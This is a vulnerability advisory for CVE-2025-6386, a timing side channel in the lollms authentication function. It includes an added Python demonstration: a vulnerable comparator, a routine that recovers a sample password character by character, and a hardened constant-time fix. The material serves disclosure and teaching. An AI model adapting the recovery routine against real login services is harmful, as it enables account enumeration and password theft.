Timing Attack Vulnerability in parisneo/lollms Authentication Function
CVE-2025-6386

7.5 HIGH

Key Information:

Vendor

Parisneo

CVE Published:
7 July 2025

What is CVE-2025-6386?

The parisneo/lollms repository contains a timing side channel in the authenticate_user function in lollms_authentication.py. An attacker who measures variations in response time can first determine which usernames are valid and then guess a user's password incrementally, one character at a time. The issue stems from the credential check using Python's default string equality operator, which compares characters sequentially and stops at the first mismatch, so the response time grows with the number of leading characters that match the stored value. The flaw is reachable over the network without prior authentication and is fixed in version 20.1.
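The following is an added illustration, not code from the lollms project: it models the early-exit comparison the advisory describes with an instrumented comparator that counts the characters compared (standing in for a wall-clock measurement, so the leak is deterministic offline), shows an attacker recovering a password from that leak position by position, and shows the usual remedy, hashing the supplied password and comparing digests with hmac.compare_digest while doing the same work for unknown users. The user store, the function names and the credential "hunter2x" are all constructed for the example; whether version 20.1 uses exactly this remedy is not stated on this page.

```python
import hashlib
import hmac
import os
import string

# Constructed sample credential store for the example (not lollms data).
USERS = {"alice": "hunter2x"}


def compare_leaky(a: str, b: str) -> tuple[bool, int]:
    """Model of a sequential, early-exit string comparison.

    Returns (equal, work), where `work` counts character comparisons made.
    A remote attacker observes `work` as response time; counting it here
    makes the side channel reproducible without timing noise.
    """
    work = 0
    if len(a) != len(b):
        return False, work
    for x, y in zip(a, b):
        work += 1
        if x != y:
            return False, work
    return True, work


def authenticate_user_vulnerable(username: str, password: str) -> tuple[bool, int]:
    """The leaky pattern: cheap early return for unknown users (enumerable)
    and an `==`-style password check whose cost depends on the prefix match."""
    stored = USERS.get(username)
    if stored is None:
        return False, 0
    return compare_leaky(stored, password)


def recover_password(oracle, alphabet=string.ascii_letters + string.digits,
                     max_len=32) -> str:
    """Attacker side: `oracle(pw)` returns (equal, work) for a known username.

    Phase 1 finds the length (only a guess of the right length enters the
    comparison loop); phase 2 extends the prefix with whichever character
    makes the server do the most work. On the last position the work is the
    same for every guess, so the (equal, work) tuple breaks the tie.
    """
    length = next(n for n in range(1, max_len + 1) if oracle("x" * n)[1] > 0)
    guess = ""
    for pos in range(length):
        pad = "\0" * (length - pos - 1)  # filler that never matches
        guess += max(alphabet, key=lambda c: oracle(guess + c + pad))
    return guess


# --- Hardened variant: hashed storage, constant-time comparison -------------

def _hash(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 20_000)


HASHED_USERS: dict[str, tuple[bytes, bytes]] = {}
_DUMMY_SALT = os.urandom(16)
_DUMMY_HASH = _hash("", _DUMMY_SALT)  # work to do for unknown usernames


def register(username: str, password: str) -> None:
    salt = os.urandom(16)
    HASHED_USERS[username] = (salt, _hash(password, salt))


for _u, _p in USERS.items():
    register(_u, _p)


def authenticate_user_hardened(username: str, password: str) -> bool:
    """Unknown users are hashed against a dummy record so the code path costs
    the same, and digests are compared with hmac.compare_digest, whose running
    time does not depend on how many leading bytes agree."""
    known = username in HASHED_USERS
    salt, expected = HASHED_USERS.get(username, (_DUMMY_SALT, _DUMMY_HASH))
    ok = hmac.compare_digest(_hash(password, salt), expected)
    return ok and known


if __name__ == "__main__":
    leaked = recover_password(lambda pw: authenticate_user_vulnerable("alice", pw))
    print("recovered via work oracle:", leaked)
    print("hardened login:", authenticate_user_hardened("alice", "hunter2x"))
```

Against a real deployment the counter is replaced by many timed requests per candidate and statistics over the samples, since network jitter dwarfs a single character comparison; the structure of the attack is the same, which is why the remedy is to remove the data-dependent branch rather than to add noise.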

Affected Version(s)

parisneo/lollms < 20.1

CVSS V3.0

Score: 7.5
Severity: HIGH
Confidentiality: High
Integrity: None
Availability: High
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: None
Scope: Unchanged
